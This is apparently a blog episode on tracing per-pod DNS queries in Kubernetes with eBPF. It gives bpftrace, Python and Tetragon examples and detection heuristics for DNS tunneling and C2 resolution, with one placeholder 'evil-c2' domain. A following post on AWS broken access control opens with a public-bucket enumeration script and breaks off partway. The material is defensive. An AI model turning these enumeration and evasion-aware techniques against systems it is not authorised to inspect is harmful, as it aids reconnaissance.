eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.

TL;DR

  • DNS observability in Kubernetes with eBPF hooks the socket syscalls that carry DNS traffic, giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping
    (tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)
  • CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned
  • A compromised workload’s first observable action is often an unexpected DNS query for infrastructure that no legitimate process should ever resolve
  • The DNS syscall path in Linux goes: application calls getaddrinfo() → glibc → a send-family syscall (sendto(), or sendmmsg() when glibc sends the A and AAAA queries together) → kernel network stack → UDP packet to the CoreDNS resolver
  • You hook the sendto tracepoint to catch the query leaving the pod and the recvfrom tracepoint to catch the response arriving
  • Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself

EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags “unexpected DNS queries” — it can see the traffic on the wire, but it can’t tell you which pod sent it without restarting or deploying an agent into the pod.

Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?

With bpftrace on the node, and without changing any pod, you can see DNS queries crossing that node in under 30 seconds:

# SSH into a worker node, then:

# Watch sendto() calls addressed to port 53: which processes are making DNS queries?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /args->addr != 0/ {
    // sin_port sits at bytes 2-3 of struct sockaddr_in, in network (big-endian) order
    $port = ((uint16)((uint8 *)args->addr)[2] << 8) |
            (uint16)((uint8 *)args->addr)[3];
    if ($port == 53) {
        printf("%-20s %-6d DNS query (UDP sendto)\n", comm, pid);
    }
}
interval:s:30 { exit(); }'

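Example output (illustrative). Resolvers that connect their UDP socket first, as glibc does, pass a NULL destination address to sendto() or use sendmmsg(), so this filter misses them: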

coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
# How many DNS queries per process in the last 30 seconds?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /args->addr != 0/ {
    $port = ((uint16)((uint8 *)args->addr)[2] << 8) |
            (uint16)((uint8 *)args->addr)[3];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { exit(); }
'

Expected output:

@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one
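The port check in these one-liners depends on byte order. sin_port is stored big-endian, so byte 2 is the high byte. This small Python sketch builds a sockaddr_in the way a resolver passes it for a CoreDNS ClusterIP (10.96.0.10 is the example address used later in this post) and decodes it. Reading the two bytes in swapped order gives 13568 (0x3500) instead of 53, and a port filter written that way never matches.

```python
# Sketch: decode the destination of a raw struct sockaddr_in, the bytes the bpftrace
# one-liners read through args->addr. Layout: sin_family (2 bytes, host order),
# sin_port (2 bytes, network/big-endian order), sin_addr (4 bytes), 8 bytes of padding.
import socket
import struct


def sockaddr_in_port(raw: bytes) -> int:
    (port,) = struct.unpack_from("!H", raw, 2)  # "!" = network byte order
    return port


def sockaddr_in_addr(raw: bytes) -> str:
    return socket.inet_ntoa(raw[4:8])


if __name__ == "__main__":
    # What a resolver passes when sending to CoreDNS at 10.96.0.10:53
    raw = (struct.pack("=H", socket.AF_INET) + struct.pack("!H", 53)
           + socket.inet_aton("10.96.0.10") + bytes(8))
    print(sockaddr_in_addr(raw), sockaddr_in_port(raw))
    print("bytes swapped:", raw[3] << 8 | raw[2])
```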

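On EKS or GKE managed nodes: you may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: kubectl debug node/<node-name> -it --profile=sysadmin --image=quay.io/iovisor/bpftrace. Node debug pods share the host's PID and network namespaces. Without --profile=sysadmin, however, they are not privileged and cannot load eBPF programs. The bpftrace program runs on the host kernel and sees all pods' DNS queries. GKE Autopilot restricts privileged pods, so use Cloud DNS query logging there instead (a Cloud DNS policy with logging enabled, exported to Cloud Logging). It records the queries but gives no per-process attribution.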


A security scan flagged unexpected DNS queries from payment-svc in the production namespace. The query domains didn’t match anything in the service’s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod’s IP — but couldn’t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod’s DNS logs.

The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.

I ran bpftrace with a recvfrom hook to catch the DNS response payloads coming back into the pod:

bpftrace -e '
tracepoint:syscalls:sys_exit_recvfrom /args->ret > 0/ {
    // Exit tracepoints expose the return value as args->ret (retval is for kretprobes)
    printf("%-20s PID %-6d received %d bytes (possible DNS response)\n",
           comm, pid, args->ret);
}
interval:s:60 { exit(); }'

Then cross-referenced the PIDs to container processes via /proc/<pid>/cgroup. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.

No restart. No sidecar deployment. Found in under two minutes.
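The PID-to-container step in that investigation can be scripted. This is a minimal Python sketch. It assumes cgroup paths in the systemd-driver format shown in the comment, as produced by containerd with the systemd cgroup driver. The regexes also accept the cgroupfs-driver form (pod<uid>/<container-id>), but other runtimes name these paths differently. Check a real /proc/<pid>/cgroup on your nodes before relying on it. Pass a host PID as the first argument.

```python
# Sketch: map a host PID to its pod UID and container ID via /proc/<pid>/cgroup.
# Assumed format (cgroup v2, systemd driver, containerd):
#   0::/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-pod<uid>.slice/cri-containerd-<64-hex-id>.scope
import re
import sys

POD_RE = re.compile(
    r"pod([0-9a-f]{8}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{12})")
CONTAINER_RE = re.compile(r"([0-9a-f]{64})")


def parse_cgroup(text: str) -> dict:
    """Return {'pod_uid': ..., 'container_id': ...}; values are None when not found."""
    pod_uid = container_id = None
    for line in text.splitlines():
        path = line.split(":", 2)[-1]  # drop the "hierarchy-id:controllers:" prefix
        pod = POD_RE.search(path)
        if pod and pod_uid is None:
            # systemd slice names replace "-" with "_" inside the pod UID
            pod_uid = pod.group(1).replace("_", "-")
        container = CONTAINER_RE.search(path)
        if container and container_id is None:
            container_id = container.group(1)
    return {"pod_uid": pod_uid, "container_id": container_id}


if __name__ == "__main__":
    pid = sys.argv[1] if len(sys.argv) > 1 else "self"
    try:
        with open(f"/proc/{pid}/cgroup") as fh:
            print(parse_cgroup(fh.read()))
    except OSError as err:
        print(f"cannot read cgroup for {pid}: {err}")
```

The pod UID can be matched against kubectl get pods -A -o custom-columns=NAME:.metadata.name,UID:.metadata.uid. The container ID appears in the pod's status.containerStatuses, which tells you whether the PID belongs to the main container or an injected sidecar.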


Why CoreDNS Metrics Don’t Give You This

CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:
– Total queries per second across the cluster
– Query latency histograms
– Error rates (NXDOMAIN, SERVFAIL)
– Upstream forwarder health

What they don’t tell you:
– Which specific pod sent a query to a specific domain
– Which process inside that pod made the getaddrinfo() call
– Whether the query came from the main container or an injected sidecar
– The timing relationship between a DNS query and the connection that followed it

CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod’s process issues the sendto() syscall — before it leaves the node. The difference is attribution.


The DNS Syscall Path in Linux

Understanding where the hook fires helps you reason about what you can observe:

Application code
    ↓
getaddrinfo("api.example.com") ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto() / sendmmsg() on a UDP socket (glibc connect()s it to the resolver first)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto (or sys_enter_sendmmsg)
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &src_addr, &src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application

getaddrinfo — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the sendto tracepoint.

tracepoint — a hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and can break when those functions are renamed, inlined, or change signature), tracepoints are maintained as a far more stable interface, although the kernel does not formally guarantee their ABI. The syscalls:sys_enter_sendto tracepoint mirrors the sendto() syscall arguments and has been present since kernel 3.x on kernels built with CONFIG_FTRACE_SYSCALLS, which mainstream distribution kernels enable. You can rely on it from Ubuntu 20.04 through the latest kernels without version checks.


Reading DNS Queries at the Tracepoint

The sendto tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.

The DNS wire format for a query:

Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)

The QNAME is length-prefixed labels: \x03api\x07example\x03com\x00 for api.example.com. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:

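# Watch DNS queries from a specific process name (comm, max 15 chars); replace "payment-svc"
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /comm == "payment-svc"/ {
    // destination port: bytes 2-3 of the sockaddr, network byte order
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) {
        printf("PID %-6d sending %d bytes to DNS\n", pid, args->len);
    }
}
'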
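Once the payload is out of the kernel (for example, bytes captured with bpftrace's buf() or exported by an agent), the label encoding described above is straightforward to decode. A minimal Python sketch, assuming you already hold the raw UDP payload of a single query; parse_dns_question is a hypothetical helper, not part of bpftrace, Tetragon, or Pixie:

```python
import struct


def parse_dns_question(packet: bytes):
    """Return (qname, qtype, qclass) for the first question of a DNS query payload."""
    if len(packet) < 12:
        raise ValueError("shorter than the 12-byte DNS header")
    (qdcount,) = struct.unpack("!H", packet[4:6])  # header bytes 4-5: QDCount
    if qdcount == 0:
        raise ValueError("no question section")

    labels = []
    pos = 12  # question section starts right after the header
    while True:
        if pos >= len(packet):
            raise ValueError("QNAME runs past the end of the packet")
        length = packet[pos]
        pos += 1
        if length == 0:  # zero-length root label terminates QNAME
            break
        if length > 63:  # top bits set: compression pointer or reserved type
            raise ValueError("unsupported label type in QNAME")
        if pos + length > len(packet):
            raise ValueError("label runs past the end of the packet")
        # Tunneling payloads may carry odd bytes; keep them visible, don't crash
        labels.append(packet[pos:pos + length].decode("ascii", errors="backslashreplace"))
        pos += length

    if pos + 4 > len(packet):
        raise ValueError("truncated QTYPE/QCLASS")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return ".".join(labels), qtype, qclass


# Example: a query for api.example.com, QTYPE A (1), QCLASS IN (1)
header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
question = b"\x03api\x07example\x03com\x00" + struct.pack("!HH", 1, 1)
print(parse_dns_question(header + question))  # ('api.example.com', 1, 1)
```

Queries rarely use name compression, so the sketch rejects pointer labels instead of following them; a response parser would need to handle them.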

For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:

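# Watch DNS-related kprobe events with Tetragon. Events come from pods on the node
# served by the agent you exec into; repeat per node for cluster-wide coverage.
# Assumes a TracingPolicy that hooks the sendto path is loaded; without one,
# Tetragon emits no PROCESS_KPROBE events for it.
kubectl exec -n kube-system ds/tetragon -c tetragon -- \
  tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns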

Sample Tetragon output (abridged; the exact JSON layout depends on the Tetragon version and the TracingPolicy in use):

{
  "process": {
    "pod": {"name": "payment-svc-7d4b9f-xk2p1", "namespace": "production"},
    "binary": "/usr/bin/payment-service",
    "pid": 11043
  },
  "function_name": "__sys_sendto",
  "args": [
    {"sock_arg": {"family": "AF_INET", "protocol": "UDP",
                  "daddr": "10.96.0.10", "dport": 53}},
    {"bytes_arg": "<DNS query for metrics.datadoghq.com>"}
  ]
}

Pod name, namespace, binary, PID, and the domain being queried, all from a kernel hook (a kprobe on __sys_sendto in this output), with no sidecar and no pod restart.


Building Pod-Level DNS Attribution Without Tetragon

If you’re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:

# Get the PID from bpftrace, then (on the node, in the host PID namespace):
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
grep kubepods /proc/$PID/cgroup
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# With the systemd cgroup driver it appears with underscores instead, e.g.
# .../kubepods-burstable-pod3f8a21bc_4e7d_4b91_a3c2_8b947f6e3d12.slice/...
# (convert underscores back to dashes before the kubectl lookup)

# Map pod UID to pod name
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.uid}{" "}{.metadata.name}{" "}{.metadata.namespace}{"\n"}{end}' \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12 payment-svc-7d4b9f-xk2p1 production

That’s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.
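The cgroup step is the fiddly part to automate because the path layout depends on the cgroup driver: cgroupfs paths carry the UID with dashes, while the systemd driver encodes it in a slice name with underscores. A small Python sketch that handles both shapes, taking the /proc/<pid>/cgroup text as input (pod_uid_from_cgroup is a hypothetical helper, and other runtimes may lay paths out differently):

```python
import re
from typing import Optional

# Pod UID as it appears in cgroup paths: dashes under the cgroupfs driver,
# underscores inside systemd slice names (kubepods-burstable-pod<uid>.slice).
POD_UID_RE = re.compile(
    r"pod([0-9a-f]{8}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{12})"
)


def pod_uid_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the pod UID embedded in /proc/<pid>/cgroup content, or None."""
    for line in cgroup_text.splitlines():
        if "kubepods" not in line:
            continue  # not a Kubernetes-managed cgroup
        match = POD_UID_RE.search(line)
        if match:
            # Normalize the systemd form back to the UID Kubernetes reports
            return match.group(1).replace("_", "-")
    return None


# Illustrative inputs; "container-id" stands in for the real container ID
v1 = "12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/container-id"
v2 = ("0::/kubepods.slice/kubepods-burstable.slice/"
      "kubepods-burstable-pod3f8a21bc_4e7d_4b91_a3c2_8b947f6e3d12.slice/"
      "cri-containerd-container-id.scope")
print(pod_uid_from_cgroup(v1))  # 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
print(pod_uid_from_cgroup(v2))  # 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
```

On the node, passing the contents of /proc/<pid>/cgroup for the PID that bpftrace reported yields the UID to feed into the kubectl lookup.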


Detecting Anomalous DNS: What to Watch For

DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.

Signals worth watching at the kernel DNS layer:

Queries to non-cluster domains from unexpected processes

# Log every process sending to port 53. This does not check the domain yet:
# separating cluster names (.cluster.local) from external ones needs the
# payload parsing covered under Production Gotchas. Stops after 60 seconds.
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) {
        printf("%-20s %-6d DNS sendto\n", comm, pid);
    }
}
interval:s:60 { exit(); }'

High-frequency DNS queries from a single process (DNS tunneling fingerprint)

# Processes making more than N DNS queries per second
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
'

DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.
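The "many distinct subdomains under one parent" signal can be scored offline once a parser gives you (timestamp, PID, name) tuples. A minimal sketch, assuming fixed one-second windows, the 50-query threshold from the text, and an illustrative 80% distinct-name ratio; the parent-domain logic is deliberately naive and ignores public suffixes such as co.uk:

```python
from collections import defaultdict


def parent_domain(qname: str, levels: int = 2) -> str:
    """Naive parent: the last `levels` labels. Ignores public suffixes such as co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-levels:])


def tunneling_candidates(events, window_s=1.0, min_queries=50, min_unique_ratio=0.8):
    """Flag (pid, parent_domain) pairs that look like DNS tunneling.

    events: iterable of (timestamp_seconds, pid, qname) tuples.
    A pair is flagged if, in any fixed window of `window_s` seconds, it sent at
    least `min_queries` queries and most of them were for distinct names.
    """
    counts = defaultdict(int)
    names = defaultdict(set)
    for ts, pid, qname in events:
        key = (pid, parent_domain(qname), int(ts // window_s))
        counts[key] += 1
        names[key].add(qname.rstrip(".").lower())

    flagged = set()
    for key, total in counts.items():
        if total >= min_queries and len(names[key]) / total >= min_unique_ratio:
            flagged.add(key[:2])  # drop the window index
    return flagged


# 60 unique subdomains in one second vs. 60 repeats of one service name
events = [(10 + i * 0.01, 4242, f"{i:04x}data.tunnel.example") for i in range(60)]
events += [(10 + i * 0.01, 100, "api.example.com") for i in range(60)]
print(tunneling_candidates(events))  # {(4242, 'tunnel.example')}
```

The distinct-name ratio is what separates tunneling from a chatty but well-behaved client: both can exceed the rate threshold, but only the tunnel keeps changing the leftmost label.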

Queries immediately followed by a connection (normal vs anomalous pattern)

Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.
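A minimal correlation sketch, assuming both streams have already been exported as tuples (DNS queries with a parsed name, and TCP connects with destination address and port) and that a per-workload baseline of known domains exists. It pairs each connect with the same PID's most recent query; it does not check that the connect target was actually in the DNS answer, which would require parsing responses at sys_exit_recvfrom. The function name and tuple layouts are hypothetical:

```python
from bisect import bisect_right
from collections import defaultdict


def new_domain_then_connect(dns_events, connect_events, baseline, window_s=0.5):
    """Flag connects that closely follow a query for a never-before-seen domain.

    dns_events:     iterable of (timestamp_s, pid, qname)
    connect_events: iterable of (timestamp_s, pid, daddr, dport)
    baseline:       set of domain names this workload is known to resolve
    Returns (pid, qname, daddr, dport, delay_s) tuples.
    """
    times = defaultdict(list)  # pid -> sorted query timestamps
    names = defaultdict(list)  # pid -> qnames, parallel to `times`
    for ts, pid, qname in sorted(dns_events):
        times[pid].append(ts)
        names[pid].append(qname)

    alerts = []
    for ts, pid, daddr, dport in connect_events:
        i = bisect_right(times[pid], ts)  # number of queries at or before the connect
        if i == 0:
            continue
        delay = ts - times[pid][i - 1]  # time since this PID's most recent query
        qname = names[pid][i - 1]
        if delay <= window_s and qname not in baseline:
            alerts.append((pid, qname, daddr, dport, round(delay, 3)))
    return alerts


dns = [(1.000, 11043, "metrics.datadoghq.com"), (5.000, 666, "x9f3.evil-c2.example")]
conns = [(1.020, 11043, "10.0.0.5", 443), (5.040, 666, "203.0.113.7", 443),
         (9.000, 666, "203.0.113.7", 443)]
print(new_domain_then_connect(dns, conns, baseline={"metrics.datadoghq.com"}))
# [(666, 'x9f3.evil-c2.example', '203.0.113.7', 443, 0.04)]
```

The third connect is not flagged because four seconds have passed since the query; a long-lived C2 session would show up instead as connects with no recent query at all, which is a separate signal.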


⚠ Production Gotchas

DNS payload parsing is not trivial in bpftrace. Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with buf(), but decoding the label-encoded name needs a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie handle this parsing in purpose-built code rather than in a one-liner (Pixie, for example, captures socket data with eBPF and parses protocols in user space). For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.

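sendto fires for all UDP, not just DNS. Filter on the destination port. The destination address is at args->addr, and the port sits at bytes 2–3 of sockaddr_in (and sockaddr_in6) in network byte order, so the port value is byte[2] << 8 | byte[3]. Double-check the filter if your cluster uses a non-standard DNS port. Also note that args->addr is NULL when a process sends on a connect()ed socket, and glibc's resolver connects its UDP socket and typically sends the A and AAAA queries together with sendmmsg(), which never hits sys_enter_sendto. To cover those callers, also trace syscalls:sys_enter_sendmmsg or hook the kernel side (udp_sendmsg), where the connected destination is known.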

CoreDNS pods will appear in your DNS query trace — that’s expected. CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.

DNS over TCP is a separate code path. Most DNS queries are UDP. Large responses (>512 bytes) or DNSSEC responses may trigger TCP fallback. The sendto tracepoint catches UDP; for TCP DNS, you’d need tcp_sendmsg with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.

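Caching means not every lookup generates a DNS query. glibc's stub resolver does not cache answers inside the process, but other layers often do: the JVM caches InetAddress lookups, some HTTP clients and applications keep their own DNS caches, and nscd (when present) answers lookups over a Unix socket and sends the UDP query itself, so the query is attributed to nscd rather than your process. A service that looks up api.example.com every 100ms through an in-process cache may only generate a DNS query when the cached entry expires. If you're looking for which pods are resolving a domain and see only occasional tracepoint hits, that's expected: you are seeing the cache miss rate, not the access rate.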
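The byte-order detail in the sendto gotcha is easy to get backwards. This Python sketch builds a struct sockaddr_in the way a little-endian Linux host lays it out (an assumption: sin_family is host byte order, while sin_port and sin_addr are network byte order) and shows what each reading of the port bytes yields:

```python
import socket
import struct


def sockaddr_in(ip: str, port: int) -> bytes:
    """Build a 16-byte struct sockaddr_in as a little-endian Linux host stores it."""
    return (struct.pack("<H", socket.AF_INET)  # sin_family: host byte order
            + struct.pack("!H", port)          # sin_port: network byte order
            + socket.inet_aton(ip)             # sin_addr: network byte order
            + bytes(8))                        # sin_zero padding


def port_from_sockaddr(raw: bytes) -> int:
    # Big-endian port: byte 2 is the high byte, byte 3 the low byte
    return (raw[2] << 8) | raw[3]


raw = sockaddr_in("10.96.0.10", 53)
print(raw[:4].hex())            # 02000035
print(port_from_sockaddr(raw))  # 53
print((raw[3] << 8) | raw[2])   # 13568: the same bytes read in the wrong order
```

A filter that compares the swapped value against 53 never matches, so it fails silently rather than loudly; checking it against a known query like this is cheap insurance.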


Quick Reference

| What you want | Command |
|---|---|
| All DNS queries on a node | bpftrace -e 'tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }' |
| DNS query count per process | bpftrace -e '... { @[comm] = count(); }' |
| DNS queries from a specific process | bpftrace -e '... /comm == "my-svc"/ { ... }' |
| Map PID to pod | cat /proc/<pid>/cgroup → extract pod UID → kubectl get pods |
| DNS events with domain names (Tetragon) | tetra getevents --event-types PROCESS_KPROBE |
| DNS policy violations (Cilium) | hubble observe --verdict DROPPED --protocol DNS |
| CoreDNS query logs (requires the log plugin in the Corefile) | kubectl logs -n kube-system -l k8s-app=kube-dns |

| DNS signal | What it indicates |
|---|---|
| New domain, immediate TCP connect | Possible C2 resolution |
| 50+ queries/second from one PID | DNS tunneling candidate |
| Query to non-cluster domain from batch job | Unusual: investigate |
| NXDOMAIN responses at high rate | Misconfiguration or DGA |
| Queries from PID not matching any known binary | Injected process |

Key Takeaways

  • DNS observability in Kubernetes with eBPF uses the sendto tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar
  • CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives
  • The DNS syscall path goes: getaddrinfo() → glibc → sendto() syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the sendto() boundary
  • A compromised workload’s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log
  • Resolver caches (in the language runtime, the application, or nscd) mean the tracepoint hit rate reflects cache misses, not lookup rate; account for this when baselining
  • Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie handle it for you, while bpftrace one-liners detect the query event without the domain string

What’s Next

DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.

LSM hooks and Tetragon’s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no “detect and respond” window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.

Next: LSM and Tetragon — when the kernel says no

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

Broken Access Control in AWS: From Misconfigured S3 to Admin

Reading Time: 9 minutes



TL;DR

  • Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
  • In an authorized assessment, a public S3 bucket containing 47 million customer records had gone undetected for six months: no GuardDuty finding and no AWS Config alert, because the relevant Config rule wasn't deployed and GuardDuty was enabled only after the bucket went public
  • The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
  • The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
  • The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
  • Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.


The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled, but no finding had fired. GuardDuty raises Policy:S3/BucketAnonymousAccessGranted when it observes a change that makes a bucket public, so the change has to happen while GuardDuty is monitoring. This bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.


Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)

# Check the account-level block once: it applies to every bucket in the account
if block=$(aws s3control get-public-access-block --account-id "$ACCOUNT_ID" \
    --output json 2>/dev/null); then
  echo "$block" | jq '.PublicAccessBlockConfiguration'
else
  echo "Account-level public access block: not configured"
fi

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" --output json 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL for grants to everyone or to any authenticated AWS user
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" --output json 2>/dev/null | \
      jq -r '.Grants[]
        | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers"
                 or .Grantee.URI == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers")
        | .Permission' | tr '\n' ' ')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with a full wildcard action ("*")
